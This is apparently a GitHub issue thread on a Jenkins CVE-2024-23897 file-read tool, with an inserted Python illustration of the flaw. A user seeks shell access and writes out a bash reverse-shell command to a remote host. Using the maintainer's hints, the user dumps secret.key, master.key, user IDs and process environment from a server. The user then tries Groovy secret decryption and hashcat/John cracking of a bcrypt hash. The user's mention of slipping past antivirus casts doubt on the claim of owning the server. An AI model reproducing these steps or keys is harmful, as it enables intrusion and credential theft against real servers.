wjlin0 / CVE-2024-23897

CVE-2024-23897 - Jenkins arbitrary file read exploitation tool
MIT License

get-credentials-as-xml #2

Closed sec13b closed 1 hour ago

sec13b commented 2 hours ago

How can I use the list commands, or better, how can we get a shell?


Mode: List Available Commands Mode
Command: help
add-job-to-view,build,cancel-quiet-down,clear-queue,connect-node,console,copy-job,create-credentials-by-xml,create-credentials-domain-by-xml,create-job,create-node,create-view,declarative-linter,delete-builds,delete-credentials,delete-credentials-domain,delete-job,delete-node,delete-view,disable-job,disable-plugin,disconnect-node,enable-job,enable-plugin,get-credentials-as-xml,get-credentials-domain-as-xml,get-gradle,get-job,get-node,get-view,groovy,groovysh,help,import-credentials-as-xml,install-plugin,keep-build,list-changes,list-credentials,list-credentials-as-xml,list-credentials-context-resolvers,list-credentials-providers,list-jobs,list-plugins,mail,offline-node,online-node,quiet-down,reload-configuration,reload-job,remove-job-from-view,replay-pipeline,restart,restart-from-stage,safe-restart,safe-shutdown,session-id,set-build-description,set-build-display-name,set-external-build-result,set-next-build-number,shutdown,stop-builds,update-credentials-by-xml,update-credentials-domain-by-xml,update-job,update-node,update-view,version,wait-node-offline,wait-node-online,who-am-i

wjlin0 commented 2 hours ago

You can read this article to understand https://www.leavesongs.com/PENETRATION/jenkins-cve-2024-23897.html

But this is difficult to achieve. In old versions of Jenkins, the user password is encrypted rather than hashed. Tools such as jenkins-decrypt can be used to decrypt passwords, and some plug-ins can also be used for further attacks.

wjlin0 commented 2 hours ago

My tool can only help verify whether the vulnerability exists.

sec13b commented 2 hours ago

I read the article. Can you indicate which are "the some plug-ins can also be used for further attacks"?

sec13b commented 2 hours ago

if it used : /bin/bash

with : -a /bin/bash -c /dev/tcp/vps/11011

The command "/bin/bash -c 'bash -i >& /dev/tcp/vps/11011 0>&1'" can't be used.

wjlin0 commented 2 hours ago

I haven't looked too closely at how this vulnerability can be turned into RCE, but you can try to read the file /var/jenkins_home/users/users.xml. If you can decrypt the administrator's password, you can log in to the background to use it. The essence of this vulnerability is a file read caused by parsing errors, so you can try to start from the file.
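
An added illustration, not part of the thread or of the tool's code: a toy Python model of the parsing behaviour described above, in which an argument beginning with `@` is expanded into the lines of the named file (the args4j-style expansion behind this CVE) and the command echoes every unknown name in its error. The function names, the agent set and the temporary file are constructed for the example; the second run shows the same input with expansion switched off.

```python
import os
import tempfile


def expand_at_files(args):
    """Vulnerable behaviour modelled here: an argument starting with '@'
    is replaced by the lines of the file it names."""
    out = []
    for arg in args:
        if arg.startswith("@") and len(arg) > 1:
            with open(arg[1:], encoding="utf-8", errors="replace") as fh:
                out.extend(line.rstrip("\n") for line in fh)
        else:
            out.append(arg)
    return out


def connect_node(agent_names, known_agents):
    """Toy stand-in for a CLI command that takes agent names and echoes
    each unknown name back to the caller in an error message."""
    return [f'No such agent "{name}" exists.'
            for name in agent_names if name not in known_agents]


def run_cli(args, known_agents, expand_at=True):
    # expand_at=False is the hardened path: '@...' stays a literal string.
    parsed = expand_at_files(args) if expand_at else list(args)
    return connect_node(parsed, known_agents)


def demo():
    # Constructed sample file standing in for a server-side secret.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("line-one-of-secret\nline-two-of-secret\n")
        path = fh.name
    try:
        vulnerable = run_cli(["@" + path], known_agents={"agent-1"})
        hardened = run_cli(["@" + path], known_agents={"agent-1"},
                           expand_at=False)
    finally:
        os.unlink(path)
    return path, vulnerable, hardened


if __name__ == "__main__":
    _, vulnerable, hardened = demo()
    print("expansion on :", vulnerable)
    print("expansion off:", hardened)
```

With expansion on, every line of the file comes back inside an error string, which is why the output in this thread is file content wrapped in `No such agent "..." exists.`; with expansion off, only the literal argument is echoed.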

sec13b commented 2 hours ago

I am not the magician Houdini :D

wjlin0 commented 2 hours ago

The command in the tool and the command of shell are two different things. The command in the tool refers to the command of jenkins-cli, so the rebound shell you understand is two different things.

wjlin0 commented 2 hours ago

D

What does this sentence mean?

sec13b commented 2 hours ago

I think it is missing or was moved: ERROR: No such file: /var/jenkins_home/users/users.xml

jenkins:x:111:117:Jenkins,,,:/var/lib/jenkins:/bin/bash

wjlin0 commented 2 hours ago

It is possible that your target is not a default deployment. Try other files that you can read, such as /etc/passwd. As I said at the beginning, this vulnerability can only read files. RCE can only be used in a specific environment. It is very difficult.

sec13b commented 2 hours ago

from environ :

Command: connect-node

Filename: /proc/self/environ

XDG_SESSION_ID=c1SHELL=/bin/bashUSER=jenkinsMAIL=/var/mail/jenkinsPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binPWD=/var/lib/jenkinsLANG=en_US.UTF-8SHLVL=1HOME=/var/lib/jenkinsLOGNAME=jenkinsXDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktopXDG_RUNTIMEDIR=/run/user/111=/usr/bin/daemonJENKINS_HOME=/var/lib/jenkinsXDG_SESSION_ID=c1SHELL=/bin/bashUSER=jenkinsMAIL=/var/mail/jenkinsPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binPWD=/var/lib/jenkinsLANG=en_US.UTF-8SHLVL=1HOME=/var/lib/jenkinsLOGNAME=jenkinsXDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktopXDG_RUNTIMEDIR=/run/user/111=/usr/bin/daemonJENKINS_HOME=/var/lib/jenkins

I just want to know where I can find users.xml

Filename: /proc/self/cmdline

/usr/bin/java-Djava.awt.headless=true-Djava.net.preferIPv4Stack=true-Dhudson.DNSMultiCast.disabled=true-jar/usr/share/jenkins/jenkins.war--webroot=/var/cache/jenkins/war--httpPort=8080--httpListenAddress=0.0.0.0

wjlin0 commented 1 hour ago

read this /var/lib/jenkins/users/user.xml

/var/lib/jenkins/secret.key

/var/lib/jenkins/secrets/master.key

sec13b commented 1 hour ago

for /var/lib/jenkins/secret.key ERROR: No such agent "13ff71cb60d11dc4e198bad1f28e4dd6968b95bd04aca543bd41e517c6ba866b" exists.

for /var/lib/jenkins/secrets/master.key ERROR: No such agent "cd4b3f7c97f5dd167f360ef444e0f4c2d5509ac18fc7269fd1662657fe9cc07f002a3a5aed1608e984ddfa7efdfcbcf33a652cb175c5b2b3d37005865a6f11205b87c59c5cc944d5657e4c857aaad269b839affdf4686b73810efba3308c1ceb406233efe5a1d1f9f61af496b834293c859a983be6751b9610e9bf28de7bdc66" exists.

for "@/var/lib/jenkins/users/users.xml"

<string>mft</string>: No such agent "      <string>mft</string>" exists.
      <string>54345792Malecl_5882327822420028333</string>: No such agent "      <string>54345792Malecl_5882327822420028333</string>" exists.
      <string>34802073Ordast_4358670235219068815</string>: No such agent "      <string>34802073Ordast_4358670235219068815</string>" exists.
      <string>jomatgithub_5935750980920288132</string>: No such agent "      
<string>jomatgithub_5935750980920288132</string>" exists.

for "@/var/lib/jenkins/users/jomatgithub_5935750980920288132/config.xml"

ERROR: Error occurred while performing this command, see previous stderr output.

wjlin0 commented 1 hour ago

Is your penetration legal and compliant?

sec13b commented 1 hour ago

It is mine.

sec13b commented 1 hour ago

I have clave av, and it doesn't see what I run.

wjlin0 commented 1 hour ago

I mean, are you authorized to act?

Otherwise, I may not be able to answer you.

Our discussion is limited to how to use tools.

sec13b commented 1 hour ago

It is my Jenkins server.

sec13b commented 1 hour ago

I tried: println(hudson.util.Secret.decrypt("{XXX=}"))

and println(hudson.util.Secret.fromString("{XXX=}").getPlainText())

It doesn't show.

wjlin0 commented 1 hour ago

This vulnerability can't support you to do this. Maybe that's all I can use. From the file you gave me, I can't see anything that can be used in the future.

sec13b commented 1 hour ago

i make update

wjlin0 commented 1 hour ago

yes

sec13b commented 37 minutes ago

with more Nvidia : John hashfile --wordlist /usr/share/wordlists/rockyou.txt --format=bcrypt

hashcat-m 3200 -O -w 4 $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm .\lists\rockyou.txt